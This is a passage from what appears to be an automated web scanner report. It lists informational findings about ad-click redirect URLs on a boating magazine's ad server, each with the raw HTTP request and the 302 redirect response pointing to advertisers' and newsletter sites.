<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.253. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:39:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.254. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:01:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.255. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.256. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.257. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.258. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.259. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.260. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.261. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:39:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.262. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.263. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.264. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.265. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.266. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

